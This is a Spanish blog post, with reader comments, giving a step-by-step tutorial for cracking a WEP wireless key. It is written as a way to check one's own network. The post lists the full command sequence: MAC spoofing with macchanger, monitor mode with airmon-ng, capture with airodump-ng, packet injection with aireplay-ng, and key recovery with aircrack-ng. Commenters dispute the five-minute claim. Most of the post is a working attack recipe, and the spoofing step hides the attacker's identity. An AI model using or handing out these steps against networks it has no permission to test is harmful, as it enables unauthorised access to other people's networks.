Clave WEP en 5 minutos y a dormir

Eso de las auditorias wireless antes era algo un tanto complicado, era mas dificil conseguir un driver que te permitiera poner tu tarjeta en modo monitor para poder inyectar, actualmente es algo que se hace practicamente con un clic, pero siempre es bueno ver la raiz para evitarse problemas.

Lo pondre para Fedora y Para Ubuntu pero pues es lo mismo la instalacion de los paquetes solo cambia «yum» por «apt-get»

0. Nos hacemos superpoderosos =D

$su-

password:xxxxxxxxx

1. Como primer paso instalaremos nuestra mascara:

fedora: #yum install macchanger

Ubuntu: #apt-get install macchanger

2. (Nos aseguramos de no estar conectados a alguna de las redes inalambricas)  y procedemos a poner nuestra tarjeta en modo monitor.

#airmon-ng start wlan0

 

En mi caso uso un chipset Broadcom (BCM4312)  y tenemos la siguiente salida:

Interface            Chipset                                Driver
wlan0                 Broadcom                           b43 – [phy0]

3. Ahora cambiaremos nuestra MAC

#ifconfig mon0 down //damos de baja la interfaz mon0 para poder cambiar la MAC

#macchanger -m XX:XX:XX:XX:XX:XX mon0 //Donde «-m» es el modo del programa para poder insertar una nueva MAC y «XX:…»  es la nueva MAC

#ifconfig mon0 up //damos de alta de nuevo la interfaz que ocuparemos

4. Procedemos a hacer un escaneo de todas las redes en nuestro alcance…

#airodump-ng mon0

 

(Ya que identificamos nuestra red xD para verificar nuestra seguridad… seguimos…)

5. Es hora de lo «bueno»

#airodump-ng -c [# canal] -w [nombre red] –bssid [direccion MAC] mon0

 

En esta parte ponemos a airodump-ng a trabajar en nuestra red exclusivamente.

6. Si tenemos «Terminator» abrimos otro espacio de trabajo, si no abrimos otra terminal

#aireplay-ng -1 6000 -a [direccion MAC] -h XX:XX:XX:XX:XX:XX mon0

Es hora de estar inyectando paquetes 🙂

 

7. Abrimos de nuevo otro espacio y aplicamos

#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h XX:XX:XX:XX:XX:XX mon0

Donde «FF:…», es una direccion de memoria desencriptar.

(Nos pedira una aprobacion le diremos que si (y))

8. El ultimo paso el mas emocionante y el que tal vez nos haga sufrir :D, siempre hay que ser pacientes normalmente para una WEP de INFINITUM nos tardaremos unos 30000 paquetes.

#aircrack-ng -z [nombre red]*.cap

De aqui cada 5 mil paquetes se hara la busqueda de parte de Aircrack-ng para intentar encontrar la clave.

Todos los paquetes se guardaran en el directorio donde arrancaste los comandos y por ultimo la clave se dara en formato [XX:XX:XX:XX:XX], y listo tenemos nuestra red, nos daremos cuenta que es muy facil y que deberiamos cambiar nuestra proteccion por algo un tanto mejor. (WPA y WPA2… Proximamente)

Veran que esto se puede modificar bastante guardando los paquetes de maneras diferentes y ocupandolos de maneras diferentes, y como dice el titulo 5 minutos y a dormir, lo hacemos super rapido y lo demas es cosa de tener paciencia y porque no dormir =D.

3 respuestas a “Clave WEP en 5 minutos y a dormir

  1. es mentira eso de los cinco minutos!!!

    ya lo intento un amigo que estudia conmigo y nos tomo como 7 u 8 hotas!! poor que me quieres engañar?

    el titulo de clave wep en 5 minutos es una farsa!! jum!
    aparte el aircrack no es compatible con todas la tarjetas de red.

    «no juegues con nuestros sentimientos» 😛

    • Hola @Pazthor, a los que no lo conozcan es un bloguero entusiasta, que aqui aplico la comedia…
      , pero es que puede tardar mucho si no tienes la tarjeta a la mano y andas pidiendo las de los demas xD… pero si lo haces en 5 mins lo garantizo, todo esto recuerden es para comprobar la seguridad de nuestras redes 😀

Replica a Angelverde Cancelar la respuesta